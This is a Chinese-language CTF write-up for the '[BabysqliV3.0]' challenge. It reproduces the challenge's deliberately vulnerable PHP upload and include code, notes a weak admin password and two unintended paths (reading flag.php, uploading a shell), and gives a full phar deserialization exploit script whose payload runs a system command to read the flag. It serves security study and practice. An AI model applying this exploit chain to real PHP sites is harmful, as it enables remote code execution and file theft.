[BabysqliV3.0]phar反序列化

文章目录

    • [BabysqliV3.0]phar反序列化

[BabysqliV3.0]phar反序列化

开始以为是sql注入

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ST1jvadM-1691302941344)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032140269.png)]

账号为:admin,一直试都没反应,后来发现可以弱口令,密码:password

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PKuBGWCd-1691302941344)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032141726.png)]

一个文件上传页面:

image-20230803214327490

在file参数存在文件包含:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eLLkRDru-1691302941345)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032143134.png)]

home.php


session_start();
echo " Home";
error_reporting(0);
if(isset($_SESSION['user'])){
	if(isset($_GET['file'])){
		if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
			die("hacker!");
		}
		else{
			if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
				$file = $_GET['file'].".php";
			}
			else{
				$file = $_GET['file'].".fxxkyou!";
			}
			echo "当前引用的是 ".$file;
			require $file;
		}

	}
	else{
		die("no permission!");
	}
}
?>

upload.php

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<form action="" method="post" enctype="multipart/form-data">
	上传文件
	<input type="file" name="file" />
	<input type="submit" name="submit" value="上传" />
</form>

<?php
error_reporting(0);
class Uploader{
	public $Filename;
	public $cmd;
	public $token;


	function __construct(){
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;
		}

		$this->cmd = "echo '

Master, I want to study rizhan!

';"
; $this->token = $_SESSION['user']; } function upload($file){ global $sandbox; global $ext; if(preg_match("[^a-z0-9]", $this->Filename)){ $this->cmd = "die('illegal filename!');"; } else{ if($file['size'] > 1024){ $this->cmd = "die('you are too big (′▽`〃)');"; } else{ $this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');"; } } } function __toString(){ global $sandbox; global $ext; // return $sandbox.$this->Filename.$ext; return $this->Filename; } function __destruct(){ if($this->token != $_SESSION['user']){ $this->cmd = "die('check token falied!');"; } eval($this->cmd); } } if(isset($_FILES['file'])) { $uploader = new Uploader(); $uploader->upload($_FILES["file"]); if(@file_get_contents($uploader)){ echo "下面是你上传的文件:
"
.$uploader."
"
; echo file_get_contents($uploader); } } ?>

这题有两个非预期解:

if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}

if(@file_get_contents($uploader)){
    echo "下面是你上传的文件:
"
.$uploader."
"
; echo file_get_contents($uploader); }

我们可以控制文件名的参数,并且获取文件名的文件内容

非预期解1:

我们直接读flag.php:

[BabysqliV3.0]phar反序列化_第1张图片

非预期解2:

我们可以直接上传一个shell:

[BabysqliV3.0]phar反序列化_第2张图片

预期解:

phar反序列化

难点主要是需要绕过:token

function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}

但是如果上次文件不加name参数,会讲session写入文件名:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6eEMtHuE-1691302941346)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032150189.png)]

随便上传一个文件,获取token

[BabysqliV3.0]phar反序列化_第3张图片

构造phar文件:


    class Uploader{
	public $Filename;
	public $cmd = "system('tac /var/www/html/flag.php');";
	public $token = "GXY2088cabe1723182d413a31dd560b1766";
}

    @unlink("phar.phar");  //先删除存在的phar.phar
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub(''); //设置stub
    $o = new Uploader();
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();

我们将phar文件上传上去:

[BabysqliV3.0]phar反序列化_第4张图片

然后在文件名中包含phar://,配合file_get_contents()就会将phar反序列化,获得flag

[BabysqliV3.0]phar反序列化_第5张图片

你可能感兴趣的:(wp,安全,web安全)